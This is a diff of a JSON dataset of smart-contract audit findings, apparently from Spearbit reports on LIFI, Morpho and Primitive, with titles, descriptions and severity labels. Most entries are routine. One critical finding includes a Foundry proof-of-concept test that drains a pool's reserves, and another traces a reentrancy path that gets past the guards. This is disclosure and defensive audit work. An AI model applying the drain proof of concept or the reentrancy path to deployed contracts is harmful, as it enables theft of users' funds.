... { ... } function _executeSwaps(..., address payable _receiver) ... { ... } }", + "title": "matchingEngine should be initialized in PositionsManagerForAaveLogics initialize function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "MatchingEngineForAave inherits from PositionsManagerForAaveStorage which is an UUPSUp- gradeable contract. Following UUPS best practices, should also be initialized. the MatchingEngineForAave deployed by PositionsManagerForAaveLogic", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Native tokens dont need SwapData.approveTo", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. These checks also include a check on approveTo, however approveTo is not relevant when a native token is being used. Currently the caller of the Lifi Diamond has to specify a whitelisted currentSwapData.approveTo to be able to execute _executeSwaps() which doesnt seem logical. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... 
if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } }", + "title": "Misc: notation, style guide, global unit types, etc", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Follow Solidity notation, the standard style guide and global unit types to improve readability.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Inaccurate comment on the maxApproveERC20() function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, it has been observed that the comment is incompatible with the functionality. The maxApproveERC20 function approves MAX if the asset id does not have a sufficient allowance. The comment can be replaced with \"If a sufficient allowance is not present, the allowance is set to MAX.\" /// @notice Gives MAX approval for another address to spend tokens /// @param assetId Token address to transfer /// @param spender Address to give spend approval to /// @param amount Amount to approve for spending function maxApproveERC20( IERC20 assetId, address spender, uint256 amount )", + "title": "Outdated or wrong Natspec documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Some Natspec documentation is missing parameters/return values or is not correctly updated to reflect the function code.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Undocumented contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "All systematic contracts are documented in the docs directory. However, several contracts are not documented. LiFi is integrated with third-party platforms through an API. To understand the code functionality, the related contracts should be documented in the directory.", + "title": "Use the official UniswapV3 0.8 branch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The current repository creates local copies of the UniswapV3 codebase and manually migrates the contracts to Solidity 0.8.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Utilize built-in library function on the address check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the codebase, the LibAsset library contains a function which determines whether the given assetId is the native asset. However, this check is not used and many of the other contracts apply the address check separately. contract AmarokFacet { function startBridgeTokensViaAmarok(...) ... { ... if (_bridgeData.assetId == address(0)) ... } function swapAndStartBridgeTokensViaAmarok(... ) ... { ... if (_bridgeData.assetId == address(0)) ... } } contract AnyswapFacet { function swapAndStartBridgeTokensViaAnyswap(...) ... { ... if (_anyswapData.token == address(0)) revert TokenAddressIsZero(); ... } } contract HyphenFacet { function _startBridge(...) ... { ... if (_hyphenData.token != address(0)) ... } } contract StargateFacet { function _startBridge(...) ... { ...
if (token == address(0)) ... } } contract LibAsset { function transferFromERC20(...) ... { ... if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); ... } function transferAsset(...) ... { ... (assetId == NATIVE_ASSETID) ... } }", + "title": "Unused events and unindexed event parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Certain parameters should be defined as indexed to track them from web3 applications / security monitoring tools.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Consider using wrapped native token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The code currently supports bridging native tokens. However, this has the following drawbacks: not every bridge supports native tokens; native tokens have an inherent risk of reentrancy; native tokens introduce additional code paths, which are more difficult to maintain and result in a higher risk of bugs. Also, wrapped tokens are more composable. This is also useful for bridges that currently don't support native tokens, like the AxelarFacet, the WormholeFacet, and the StargateFacet.", + "title": "Rewards are ignored in the on-pool rate computation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Morpho claims that the protocol is a strict improvement upon the underlying lending protocols. It tries to match as many suppliers and borrowers P2P at the supply/borrow mid-rate of the underlying protocol. However, given the high reward incentives paid out to on-pool users, it could be the case that being on the pool yields a better rate than the P2P rate.", "labels": [ "Spearbit", - "LIFI", + "Morpho", "Severity: Informational" ] }, { - "title": "Incorrect event emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Li.fi follows a two-step ownership transfer pattern, where the current owner first proposes an address to be the new owner. Then that address accepts the ownership in a different transaction via confirmOwnershipTransfer(): function confirmOwnershipTransfer() external { if (msg.sender != pendingOwner) revert NotPendingOwner(); owner = pendingOwner; pendingOwner = LibAsset.NULL_ADDRESS; emit OwnershipTransferred(owner, pendingOwner); } At the time of emitting OwnershipTransferred, pendingOwner is always address(0) and owner is the new owner. This event should be used to log the addresses between which the ownership transfer happens.", + "title": "tradingFunction returns wrong invariant at bounds, allowing to steal all pool reserves", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The tradingFunction computing the invariant value of k = Φ^-1(y/K) - Φ^-1(1-x) + σ√τ returns the wrong value at the bounds of x and y. The bounds of x are 0 and 1e18; the bounds of y are 0 and K, the strike price. If x or y is at these bounds, the corresponding term's computation is skipped and therefore implicitly set to 0, its initialization value.
int256 invariantTermX; // Φ^-1(1-x) // @audit if x is at the bounds, the term remains 0 if (self.reserveXPerWad.isBetween(lowerBoundX + 1, upperBoundX - 1)) { invariantTermX = Gaussian.ppf(int256(WAD - self.reserveXPerWad)); } int256 invariantTermY; // Φ^-1(y/K) // @audit if y is at the bounds, the term remains 0 if (self.reserveYPerWad.isBetween(lowerBoundY + 1, upperBoundY - 1)) { invariantTermY = Gaussian.ppf( int256(self.reserveYPerWad.divWadUp(self.strikePriceWad)) ); } Note that Φ^-1 = Gaussian.ppf is the probit function, which is undefined at 0 and 1.0 but tends towards -infinity at 0 and +infinity at 1.0 = 1e18. (The closest values used in the Solidity approximation are Gaussian.ppf(1) = -8710427241990476442 ~ -8.71 and Gaussian.ppf(1e18-1) = 8710427241990476442 ~ 8.71.) This fact can be abused by an attacker to steal the pool reserves. For example, the y-term Φ^-1(y/K) will be negative for y/K < 0.5. Trading out the entire y reserve will compute the new invariant with y set to 0, and the y-term Φ^-1(y/K) = Φ^-1(0) = -infinity is set to 0 instead, increasing the overall invariant and accepting the swap. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"solmate/utils/SafeCastLib.sol\"; import \"./Setup.sol\"; contract TestSpearbit is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; function test_swap_all_out() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { (uint256 reserveAsset, uint256 reserveQuote) = subject().getPoolReserves(ghost().poolId); bool sellAsset = true; uint128 amtIn = 2; // pass reserve-not-stale check after taking fee uint128 amtOut = uint128(reserveQuote); uint256 prev = ghost().quote().to_token().balanceOf(actor()); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amtIn, output: amtOut, sellAsset: sellAsset }); subject().swap(order); uint256 post = ghost().quote().to_token().balanceOf(actor()); assertTrue(post > prev, \"swap-failed\"); } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "If statement does not check mintAmount properly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the zapIn function, mintAmount is checked with the following if statement. However, it directly takes the contract balance instead of taking the difference between mintAmount and preMintBalance. ... ... uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)); if (!success && mintAmount == 0) { revert MintingError(res); } mintAmount = mintAmount - preMintBalance;", + "title": "getSpotPrice, approximateReservesGivenPrice, getStrategyData ignore time to maturity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "When calling getSpotPrice, getStrategyData or approximateReservesGivenPrice, the pool config is transformed into a NormalCurve struct.
This transformation always sets the time to maturity field to the entire duration: function transform(PortfolioConfig memory config) pure returns (NormalCurve memory) { return NormalCurve({ reserveXPerWad: 0, reserveYPerWad: 0, strikePriceWad: config.strikePriceWad, standardDeviationWad: config.volatilityBasisPoints.bpsToPercentWad(), timeRemainingSeconds: config.durationSeconds, invariant: 0 }); } Neither is the curve.timeRemainingSeconds value overridden with the correct value for the mentioned functions. The reported spot price will be wrong after the pool has been initialized and integrators cannot rely on this value.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Use address(0) for zero address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "It's better to use the shorthands provided by Solidity for popular constant values to improve readability and reduce the likelihood of errors. address internal constant NULL_ADDRESS = 0x0000000000000000000000000000000000000000; //address(0)", + "title": "Numerical error on larger trades favors the swapper relative to mathematically ideal pricing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "To test the accuracy of the Solidity numerical methods used, a Python implementation of the swap logic was created using a library that supports arbitrary precision (https://mpmath.org/). Solidity swap executions generated in a custom fuzz test were compared against arbitrary precision results using Foundry's ffi feature (https://book.getfoundry.sh/forge/differential-ffi-testing). Cases where the \"realized\" swap price was better for the swapper than the \"ideal\" swap price were flagged. Deviations in the swapper's favor as large as 25% were observed (and larger ones likely exist). These seem to be a function of the size of the swap made--larger swaps favor the swapper more than smaller swaps (in fact, deviations were observed to trend towards zero as swap size relative to pool size decreased). It is unclear if there's any problem in practice from this behavior--large swaps will still incur large slippage and are only incentivized when the price has \"jumped\" drastically; fees also help make up for losses. Without going further, it can be stated that there is a risk for pools with frequent discontinuous price changes to track the theoretical payoff more poorly, but further numerical investigations are needed to determine whether there's a serious concern. The test cases below require the simulation repo to be cloned into a Python virtual environment in a directory named primitive-math-venv with the needed dependencies at the same directory hierarchy level as the portfolio repository. That is, the portfolio/ directory and primitive-math-venv/ directories should be in the same folder, and the primitive-math-venv/ folder should contain the primitive-sim repository. The virtual environment needs to be activated and have the mpmath, scipy, numpy, and eth_abi dependencies installed via pip or another method. Alternatively, these can be installed globally, in which case the primitive-math-venv directory does not need to be a virtual environment.
// SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"solmate/utils/SafeCastLib.sol\"; import \"./Setup.sol\"; contract TestNumericalDeviation is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; bool printLogs = true; function _fuzz_random_args( bool sellAsset, uint256 amountIn, uint256 amountOut ) internal returns (bool swapExecuted) { Order memory maxOrder = subject().getMaxOrder(ghost().poolId, sellAsset, actor()); amountIn = bound(amountIn, maxOrder.input / 1000 + 1, maxOrder.input); amountOut = subject().getAmountOut(ghost().poolId, sellAsset, amountIn, actor()); if (printLogs) console.log(\"amountOut: \", amountOut); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amountIn.safeCastTo128(), output: amountOut.safeCastTo128(), sellAsset: sellAsset }); try subject().simulateSwap({ order: order, timestamp: block.timestamp, swapper: actor() }) returns (bool swapSuccess, int256 prev, int256 post) { try subject().swap(order) { assertTrue( swapSuccess, \"simulateSwap-failed but swap succeeded\" ); assertTrue(post >= prev, \"post-invariant-not-gte-prev\"); swapExecuted = true; } catch { assertTrue( !swapSuccess, \"simulateSwap-succeeded but swap failed\" ); } } catch { // pass this case } } struct TestVals { uint256 strike; uint256 volatility_bps; uint256 durationSeconds; uint256 ttm; } // fuzzing entrypoint used to find violating swaps function test_swap_deviation(uint256 amtIn, uint256 amtOut) public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } string[] memory cmds = new string[](18); cmds[0] = \"python3\"; cmds[1] = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; cmds[2] = \"--x\"; cmds[3] = vm.toString(preXPerL); cmds[4] = \"--y\"; cmds[5] = vm.toString(preYPerL); cmds[6] = \"--strike\"; cmds[7] = vm.toString(tv.strike); cmds[8] = \"--vol_bps\"; cmds[9] = vm.toString(tv.volatility_bps); cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalDependentPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalDependentPerL: \", idealFinalDependentPerL); uint256 postDependentPerL = sellAsset ? postYPerL : postXPerL; // Only worried if swap was _better_ than ideal if (idealFinalDependentPerL > postDependentPerL) { uint256 diff = idealFinalDependentPerL - postDependentPerL; uint256 percentErrWad = diff * 1e18 / idealFinalDependentPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } function test_swap_gt_2pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 6552423086988641261559668799172253742131420409793952225706522955; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } string[] memory cmds = new string[](18); cmds[0] = \"python3\"; cmds[1] = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; cmds[2] = \"--x\"; cmds[3] = vm.toString(preXPerL); cmds[4] = \"--y\"; cmds[5] = vm.toString(preYPerL); cmds[6] = \"--strike\"; cmds[7] = vm.toString(tv.strike); cmds[8] = \"--vol_bps\"; cmds[9] = vm.toString(tv.volatility_bps); cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalYPerL: \", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); // assert at worst 2% error assertLt(percentErrWad, 0.02 * 1e18); } } function test_swap_gt_5pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 524204019310836059902749478707356665714276202503631350973429403; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } string[] memory cmds = new string[](18); cmds[0] = \"python3\"; cmds[1] = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; cmds[2] = \"--x\"; cmds[3] = vm.toString(preXPerL); cmds[4] = \"--y\"; cmds[5] = vm.toString(preYPerL); cmds[6] = \"--strike\"; cmds[7] = vm.toString(tv.strike); cmds[8] = \"--vol_bps\"; cmds[9] = vm.toString(tv.volatility_bps); cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalYPerL: \", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); // assert at worst 5% error assertLt(percentErrWad, 0.05 * 1e18); } } function test_swap_gt_25pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 110109023928019935126448015360767432374367360662791991077231763772041488708545; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } string[] memory cmds = new string[](18); cmds[0] = \"python3\"; cmds[1] = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; cmds[2] = \"--x\"; cmds[3] = vm.toString(preXPerL); cmds[4] = \"--y\"; cmds[5] = vm.toString(preYPerL); cmds[6] = \"--strike\"; cmds[7] = vm.toString(tv.strike); cmds[8] = \"--vol_bps\"; cmds[9] = vm.toString(tv.volatility_bps); cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalYPerL: \", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Low Risk" ] }, { - "title": "Better variable naming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "MAX_INT is defined to be the maximum value of the uint256 data type: uint256 private constant MAX_INT = type(uint256).max; This variable name can be interpreted as the maximum value of the int256 data type, which is lower than type(uint256).max.", + "title": "getMaxOrder overestimates output values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The getMaxOrder function adds + 1 to the output value, overestimating the output value. This can lead to failed swaps if this value is used. tempOutput = pool.virtualY - lowerY.mulWadDown(pool.liquidity) + 1; It's also easy to see that with lowerY = 0 we have tempOutput = pool.virtualY - lowerY.mulWadDown(pool.liquidity) + 1 = pool.virtualY + 1, i.e., the max out amount would be more than the pool reserves.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Low Risk" ] }, { - "title": "Event is missing indexed fields", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Indexed event fields are more quickly accessible to off-chain tools that parse events.
However, note that each indexed field costs extra gas during emission, so it's not necessarily best to index the maximum allowed per event (three fields).", + "title": "Improve reentrancy guards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "Previously, only settlement performed calls to arbitrary addresses through ERC20 transfers. With recent additions, like the ERC1155._mint and user-provided strategies, single actions like allocate and swap also perform calls to potentially malicious contracts. This increases the attack surface for reentrancy attacks. The current way of protecting against reentrancy works by setting multicall flags (_currentMulticall) and locks (preLock() and postLock()) on multicalls and single-action calls. However, the single calls essentially skip reentrancy guards if the outer context is a multicall. This still allows for reentrancy through control flows like the following: // reenter during multicall's action execution multicall preLock() singleCall() reenter during current execution singleCall() preLock(): passes because we're in multicall skips settlement postLock(): passes because we're in multicall _currentMulticall = false; settlement() postLock() // reenter during multicall's settlement multicall preLock() singleCall preLock(): ... postLock(): `_locked = 1` _currentMulticall = false; settlement() reenter singleCall() passes preLock because not locked multiCall() passes multicall reentrancy guard because not in multicall passes preLock because not locked ... settlement finishes postLock()", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Low Risk" ] }, { - "title": "Remove misleading comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "WithdrawFacet.sol has the following misleading comment which can be removed. It's unclear why this comment was made. address self = address(this); // workaround for a possible solidity bug", + "title": "approximatePriceGivenX does not need to compute y-bounds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The approximatePriceGivenX function does not need to compute the y-bounds by calling self.getReserveYBounds().", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Redundant events/errors/imports on the contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, it has been observed that several events and errors are not used in the contracts. By deleting the redundant events and errors, gas can be saved.
FusePoolZap.sol#L28 - CannotDepositNativeToken GenericSwapFacet.sol#L7 - ZeroPostSwapBalance WormholeFacet.sol#L12 - InvalidAmount and InvalidConfig HyphenFacet.sol#L32 - HyphenInitialized HyphenFacet.sol#L9 - InvalidAmount and InvalidConfig HopFacet.sol#L9 - InvalidAmount, InvalidConfig and InvalidBridgeConfigLength HopFacet.sol#L36 - HopInitialized PolygonBridgeFacet.sol#L28 - InvalidConfig Executor.sol#L5 - IAxelarGasService AcrossFacet.sol#L37 - UseWethInstead, InvalidAmount, NativeValueWithERC, InvalidConfig NXTPFacet.sol#L9 - InvalidAmount, NativeValueWithERC, NoSwapDataProvided, InvalidConfig", + "title": "Unnecessary computations in NormalStrategy.beforeSwap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The NormalStrategy.beforeSwap function calls getSwapInvariants to simulate an entire swap with current and post-swap invariants. However, only the current invariant value is used.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "forceSlow option is disabled on the AmarokFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the AmarokFacet contract, the forceSlow option is disabled. According to the documentation, forceSlow is an option that allows users to take the Nomad slow path (~30 mins) instead of paying routers a 0.05% fee on their transaction. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", + "title": "Pools can use malicious strategies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "Anyone can create pools and configure the pool to use a custom strategy. A malicious strategy can disable swapping and (de-)allocating at any time, as well as enable privileged parties to trade out all pool reserves by implementing custom logic in the validateSwap function.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Incomplete NatSpec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Some functions are missing @param for some of their parameters.
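For example, complete NatSpec would document every parameter (hypothetical function, for illustration only):
/// @notice Transfers an asset from the contract to a receiver.
/// @param assetId Token address (address(0) denotes the native asset).
/// @param receiver Address that receives the asset.
/// @param amount Amount of the asset to transfer.
function transferAsset(address assetId, address payable receiver, uint256 amount) internal { ... }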
